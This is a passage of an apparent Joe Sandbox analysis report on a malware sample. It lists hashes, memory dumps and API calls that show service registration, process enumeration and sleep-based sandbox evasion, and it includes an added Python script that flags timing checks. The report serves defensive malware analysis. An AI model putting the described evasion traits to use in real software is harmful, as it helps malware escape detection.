                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3300348e49dc20250f9251706d8ae2e06ffa62cde23a70230bff88acc59b0d1c
                                                                                                                                                                                                            • Instruction ID: 1b36b70668174866a7d084d29e63dd59c7d11bbbc5b85db2b4588cfbe351824a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3300348e49dc20250f9251706d8ae2e06ffa62cde23a70230bff88acc59b0d1c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 486235B5A0020DCFD714EF25FD896653BF2FB90310B21901AE942AB3B5EB315856EF81
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: +#T
                                                                                                                                                                                                            • API String ID: 0-666610905
                                                                                                                                                                                                            • Opcode ID: 422c876e055d41d0b02bdadc8726d90ad7b3274a0ab25eddf13e6db2f4b69a27
                                                                                                                                                                                                            • Instruction ID: 91ff3235ded36b306e67d7bf0c2d222f5f3610f7a08c46412a72126810ec7bbb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 422c876e055d41d0b02bdadc8726d90ad7b3274a0ab25eddf13e6db2f4b69a27
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA9256B6A0020DDFCB04DF25FD855AA3BB5FB94310B11551AE842B3374E7309A66EF92
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(?,00000010), ref: 00EE9C49
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID:
• API String ID: 3545744682-0
• Opcode ID: 484b53b6e741d3e81c12055320c2ad313c823d89d69ec2581c0741edf8eda33b
• Instruction ID: fef05058d4739fb4a08e9eba1296b223252e6c273f74f35722525bbcd662f958
• Opcode Fuzzy Hash: 484b53b6e741d3e81c12055320c2ad313c823d89d69ec2581c0741edf8eda33b
• Instruction Fuzzy Hash: 4C62227590020DCFC704EF60FD92AB937B5FBA4310F10906AE546A32B5EB706A99EF51

Strings
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID:
• String ID: Bzb
• API String ID: 0-2804807757
• Opcode ID: d5a29f0763e1f5b484e8d8e9f5f87992b5662648d034601d0e82c43a36932234
• Instruction ID: fe84be1d4fd83e1ee81bae1077240034114e20fb0505da534d128802b78f8914
• Opcode Fuzzy Hash: d5a29f0763e1f5b484e8d8e9f5f87992b5662648d034601d0e82c43a36932234
• Instruction Fuzzy Hash: 2D72FC7AA1121DCFC754DF29FD851613BF2FB983603168016D881E72B1E734A8A5EF85

APIs
  • Part of subcall function 00EF08B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EF0929
  • Part of subcall function 00EF08B0: __aulldiv.LIBCMT ref: 00EF0953
  • Part of subcall function 00ED1200: Sleep.KERNEL32(000003E8), ref: 00ED139B
• Sleep.KERNEL32(000008AE), ref: 00EE2C03
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: SleepTime$FileSystem__aulldiv
• String ID:
• API String ID: 3227937447-0
• Opcode ID: 61606da5c4849da9fc251addb2e9cb328ff9ab8ab32e6d23ef5046e66d91c21d
• Instruction ID: 5c3be1a85f3c9be32783f53c31263d8d0945b558e1edbe80245eff6fce752527
• Opcode Fuzzy Hash: 61606da5c4849da9fc251addb2e9cb328ff9ab8ab32e6d23ef5046e66d91c21d
• Instruction Fuzzy Hash: 63425575A0020CCFD704DF61FD92ABA3BB6FB94320F11815AE542A32B4EB3459A5EF51
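The APIs list above pairs two Sleep calls (0x3E8 and 0x8AE milliseconds) with a GetSystemTimeAsFileTime call reached through a subcall, which is the shape behind the "evasive API chain (date check)" and "may sleep (evasive loops)" signatures in the overview. When triaging a report like this one, it is useful to pull every such pairing out of the function listing automatically rather than reading each entry. The script below is an added example, not Joe Sandbox code and not its signature logic: it parses "APIs" bullets in the exact line layout this report uses, converts the hex Sleep arguments to milliseconds, and flags entries where a sleep and a time-query API appear together. The line regex, the set of time-query APIs beyond GetSystemTimeAsFileTime, and the sleep-plus-time-query heuristic are my assumptions; the sample input is constructed from the lines visible on this page.

```python
import re
from collections import Counter

# Constructed sample input: the "APIs" lists of two function entries, copied in the
# layout this report uses (the entry whose top-level call is Sleep at 00EE2C03, and
# the entry whose top-level call is StartServiceCtrlDispatcherA at 00ECC692).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00EF08B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EF0929
  • Part of subcall function 00EF08B0: __aulldiv.LIBCMT ref: 00EF0953
  • Part of subcall function 00ED1200: Sleep.KERNEL32(000003E8), ref: 00ED139B
• Sleep.KERNEL32(000008AE), ref: 00EE2C03
Memory Dump Source
APIs
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 00ECC692
Memory Dump Source
"""

# One bullet of an "APIs" list (assumed format, derived from the lines above).
# Subcall bullets carry the callee address; args are a hex constant or "?" when
# the sandbox could not resolve them; some CRT helpers have no argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Assumed set of APIs a sleep-based timing check reads the clock with; the report
# itself only shows the first one.
TIME_QUERY_APIS = {"GetSystemTimeAsFileTime", "GetTickCount", "GetTickCount64",
                   "QueryPerformanceCounter", "GetLocalTime", "GetSystemTime"}
SERVICE_ENTRY_APIS = {"StartServiceCtrlDispatcherA", "StartServiceCtrlDispatcherW"}


def parse_api_entries(text):
    """Split report text into function entries: each entry is the list of API
    calls between an 'APIs' header and the following 'Memory Dump Source' header."""
    entries, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
        elif stripped == "Memory Dump Source":
            if current is not None:
                entries.append(current)
            current = None
        elif current is not None:
            m = API_LINE.match(line)
            if m:
                call = m.groupdict()
                call["direct"] = m.group("sub") is None
                current.append(call)
    return entries


def sleep_ms(args):
    """Sleep takes dwMilliseconds; the report prints it as a hex constant.
    Returns None when the argument was not resolved ('?')."""
    if args is None or not re.fullmatch(r"[0-9A-Fa-f]+", args.strip()):
        return None
    return int(args, 16)


def analyze(entries):
    """Per entry: resolved Sleep durations, whether a clock read occurs in the same
    entry (sleep plus time query is the pairing a timing check needs), and whether
    the entry is a service entry point."""
    results = []
    for calls in entries:
        names = {c["api"] for c in calls}
        sleeps = [sleep_ms(c["args"]) for c in calls if c["api"] == "Sleep"]
        sleeps = [s for s in sleeps if s is not None]
        results.append({
            "direct_refs": [c["ref"] for c in calls if c["direct"]],
            "sleep_ms": sleeps,
            "total_sleep_ms": sum(sleeps),
            "timing_check": bool(sleeps) and bool(names & TIME_QUERY_APIS),
            "service_dispatch": bool(names & SERVICE_ENTRY_APIS),
            "module_counts": Counter(c["mod"] for c in calls),
        })
    return results


if __name__ == "__main__":
    for i, r in enumerate(analyze(parse_api_entries(SAMPLE_REPORT))):
        print(f"entry {i} refs={r['direct_refs']} sleep_ms={r['sleep_ms']} "
              f"total={r['total_sleep_ms']} timing_check={r['timing_check']} "
              f"service_dispatch={r['service_dispatch']}")
```

Run against the full report text, the script lists every function entry with a resolved sleep budget and a clock read in the same call tree, which is where to start when deciding whether a sandbox run that "stopped while the process was sleeping" simply needs a longer timeout or a patched Sleep. The heuristic only sees calls the sandbox attributed to the entry, so a timing check split across two unrelated functions will not be paired.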
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: gZ
                                                                                                                                                                                                            • API String ID: 0-129470356
                                                                                                                                                                                                            • Opcode ID: 060766898e97797508cae85bb6ef1643ae9bccf0b660e32366c9c238a65948a4
                                                                                                                                                                                                            • Instruction ID: 56deae6b1e5f7e6f96d7ed5367bed3b53b468e6a5b753cb805a7e0086f7d01e1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 060766898e97797508cae85bb6ef1643ae9bccf0b660e32366c9c238a65948a4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D326975A0020DCFC704DF26FD851683BB2FBA43607229116D885E72B9EB3598A5FF81
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: viH
                                                                                                                                                                                                            • API String ID: 0-3523788874
                                                                                                                                                                                                            • Opcode ID: 77a86b583fb01dbcface5edcde623038514373f2fe83428ad6c6d47c2647aaf8
                                                                                                                                                                                                            • Instruction ID: 08904d66b1c574cfd1b08fb8c25bca6fe9e2804949a80a4c147a5e6775b31805
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77a86b583fb01dbcface5edcde623038514373f2fe83428ad6c6d47c2647aaf8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C124676A0420DCFC704EF25FD81A7937F6FBE4320711802AE846A7275EB758856EB91
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: DH@
                                                                                                                                                                                                            • API String ID: 0-2158797763
                                                                                                                                                                                                            • Opcode ID: de3ec833a0800e9c5c38fd6e29b34485b855036ad65d9dde5cb5155ae124deea
                                                                                                                                                                                                            • Instruction ID: 39b90410948e521df87a8812eabd87321667fd5c24a3e3c52ba57d78ac530568
                                                                                                                                                                                                            • Opcode Fuzzy Hash: de3ec833a0800e9c5c38fd6e29b34485b855036ad65d9dde5cb5155ae124deea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75D1F07A60520CCFC744CF29FD851657BB2FBA5320756811AD880A73B6EB389852FB51
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID:
• String ID: 63{
• API String ID: 0-1405228871
• Opcode ID: ccff89fe0668485377f09e62f780ef7284dbaf04f34c2b58ff2a62ff65586143
• Instruction ID: 0ddfd51f24d71cab4f89e11cee311c952934f961a4c17523633e9e569437e775
• Opcode Fuzzy Hash: ccff89fe0668485377f09e62f780ef7284dbaf04f34c2b58ff2a62ff65586143
• Instruction Fuzzy Hash: C6C1EDB6605A0DCFC708DF28FC912213BF2FBA5320355411AD982D67B9E73958A5FB80

APIs
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 00ECC692
Similarity
• API ID: CtrlDispatcherServiceStart
• String ID:
• API String ID: 3789849863-0
• Opcode ID: 08caf793cbde872aa278f8ecc0774257d8f68101934eefde2f59065bc6ad6605
• Instruction ID: 04d304e1a51c4c839c27e2fcec3f00a6d61792f6ff16067e6d1210d13ec31178
• Opcode Fuzzy Hash: 08caf793cbde872aa278f8ecc0774257d8f68101934eefde2f59065bc6ad6605
• Instruction Fuzzy Hash: 61E01A75D0220C9BC704EFB4ED454AEBBF4FB88300B408A9AE414EB360EB745501DF85

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 95ddc75a53c87f5e78ba94c9d78e3876b0504af5e00414338225496c316e1cbc
• Instruction ID: 7f95925ac3052cafa6d4ed56c21fef8ed02c44fb95fcc5c27e4238137472e9c6
• Opcode Fuzzy Hash: 95ddc75a53c87f5e78ba94c9d78e3876b0504af5e00414338225496c316e1cbc
• Instruction Fuzzy Hash: 13824675A0420DCFC704EF25FD852A93BF2FBA5350B15801AD881A63BAE7344966FF85

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a8d2c28a291f400bb74ac61dad203ef75c9433b16fe653a0d5d9bb81f810065
• Instruction ID: c715c1878940e29e8e0184d91614c1e77f6f2b4b5aa2dcca4f4fdd213c355a3e
• Opcode Fuzzy Hash: 3a8d2c28a291f400bb74ac61dad203ef75c9433b16fe653a0d5d9bb81f810065
• Instruction Fuzzy Hash: D10238B6A0130DCFD708DF25FE951643BB1F7A6321312815AD882A72B9E73548A5FF80

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 629b60e97bebf0cff9e30b87cc9b5c65a690e1ca0bd33697d786fdbe934d6185
• Instruction ID: 8e661af675f3da278b2dbcb33b8f73888c191b0f9982c5c23d96981ed8641483
• Opcode Fuzzy Hash: 629b60e97bebf0cff9e30b87cc9b5c65a690e1ca0bd33697d786fdbe934d6185
• Instruction Fuzzy Hash: DDF11576B0260CCFC704DF26FC851693BB2F7D9314726811AD842A32B8EB759461EF84

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc475e609cf5c85cdbb082806a3b7177ccae0bcf6538c06b0bbbfdb521446348
• Instruction ID: 4afba5501d9f247e30c0c87fc54765f6a0b21f0c09aebd36e66bb32a58444b4a
• Opcode Fuzzy Hash: cc475e609cf5c85cdbb082806a3b7177ccae0bcf6538c06b0bbbfdb521446348
• Instruction Fuzzy Hash: D8E16376A0020DCFD714DF24FC412B53BE1F7A5325B14812AEA86E22B6E7349991EF91

Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: 31744e45162e65109ca99474c45f06abec933146bff16fee278986cb91695423
• Instruction ID: 6f4c2c3228bdc1a4255addadc520716c7071884b00313ada5047d47508d2e9e9
• Opcode Fuzzy Hash: 31744e45162e65109ca99474c45f06abec933146bff16fee278986cb91695423
• Instruction Fuzzy Hash: 36D1D176A0420DCFC704DF29FD856653BB2FB98321311852AD885D73B4E73598A2EF81

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0320c7209bd7049ce0075f62f93618beae7ca07f53c06241e11bd396ae0b9cd8
• Instruction ID: 8af3d69740b3153ed9ce6e36dc9f57968a885a88af124a264b631312686a4193
• Opcode Fuzzy Hash: 0320c7209bd7049ce0075f62f93618beae7ca07f53c06241e11bd396ae0b9cd8
• Instruction Fuzzy Hash: DCD144B5A0430DCFC705EF25FD812A93BB2F790310F198066D981A73B5E3349556EB81
APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(015BFCE0,Function_00011860), ref: 00ED6D72
• SetServiceStatus.ADVAPI32(00000000,00F305F8), ref: 00ED6DD5
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6DE9
• SetServiceStatus.ADVAPI32(00000000,00F305F8), ref: 00ED6E8A
• WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00ED6EBE
• SetServiceStatus.ADVAPI32(00000000,00F305F8), ref: 00ED6F2B
• CloseHandle.KERNEL32(00000000), ref: 00ED6F42
• SetServiceStatus.ADVAPI32(00000000,00F305F8), ref: 00ED6FAA
Strings
Similarity
• API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
• String ID: =ZMI
• API String ID: 3399922960-150576250
• Opcode ID: 993f75257717011b179b84dd92680b5cafa7e6ca035eeb4a23fbb2b9721836f8
• Instruction ID: 8efab2cca66e2f53ce2f16e55872ed816bf4437c43ccc3371fb75d0dddfcf5a0
• Opcode Fuzzy Hash: 993f75257717011b179b84dd92680b5cafa7e6ca035eeb4a23fbb2b9721836f8
• Instruction Fuzzy Hash: 01911FB5A4130DCFD304DF25FD9A5223BB6F798720705810AE895E22B8DBB84465FF86
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ED44A7
• Process32First.KERNEL32(00000000,?), ref: 00ED45C2
• CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00ED47CE
• Module32First.KERNEL32(00000000,00000224), ref: 00ED4842
• CloseHandle.KERNEL32(00000000,0000000A), ref: 00ED495A
• Process32Next.KERNEL32(?,00000128), ref: 00ED49AD
• CloseHandle.KERNEL32(00000000), ref: 00ED4A20
Similarity
• API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
• String ID:
• API String ID: 930127669-0
• Opcode ID: bea7ae8730019887069b1301f6f9c863f1bf42d7ff33c684c2ac75d97f0e92db
• Instruction ID: f7cf5590ccbed5189ac05a4cfb90f0e0d14509178262b6509897318a47586d15
• Opcode Fuzzy Hash: bea7ae8730019887069b1301f6f9c863f1bf42d7ff33c684c2ac75d97f0e92db
• Instruction Fuzzy Hash: E9F165B1A0020DCFD704DF25FD866A93BB6F7D5321B11405AD886E62B4EB7488A6FF41
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ECBC90
• Process32First.KERNEL32(00000000,?), ref: 00ECBCE3
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECBDDD
Similarity
• API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
• String ID:
• API String ID: 3397401024-0
• Opcode ID: 06dbd40af95fee4b9df84260c849655c6504dd0f537da668f3296eebba71b4c1
• Instruction ID: 7f3089d3b4962ffc562e55b735e338fc14a634655d833947e6f6ac636ec4389e
• Opcode Fuzzy Hash: 06dbd40af95fee4b9df84260c849655c6504dd0f537da668f3296eebba71b4c1
• Instruction Fuzzy Hash: EB91157960020DCFD714DF25FD96A793BFAFBA8714B15801AD801A3270DB349999EF40
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00EDE92E,00EDCA40,00000000,?), ref: 00EF54B2
• CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00EF54E4
• CloseHandle.KERNEL32(00000000,?,00EDE92E,00EDCA40,00000000,?), ref: 00EF551D
• WaitForSingleObject.KERNEL32(?,000000FF,?,00EDE92E,00EDCA40,00000000,?), ref: 00EF5538
• CloseHandle.KERNEL32(?,?,000000FF,?,00EDE92E,00EDCA40,00000000,?), ref: 00EF554B
Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateHandle$EventObjectSingleThreadWait
                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                            • API String ID: 1404307249-3963672497
APIs
• CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00ED15C3
• GetFileTime.KERNEL32(00000000,?,?,?), ref: 00ED168A
• CloseHandle.KERNEL32(00000000), ref: 00ED16A7
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ED1715
• GetFileSize.KERNEL32(00000000,00000000,2AC18000,FE624E21,00989680,00000000), ref: 00ED1774
• CloseHandle.KERNEL32(00000000), ref: 00ED1792
Similarity
• API ID: File$CloseHandle$CreateSizeTimeUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID:
• API String ID: 3236713533-0
APIs
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00ECBDDD
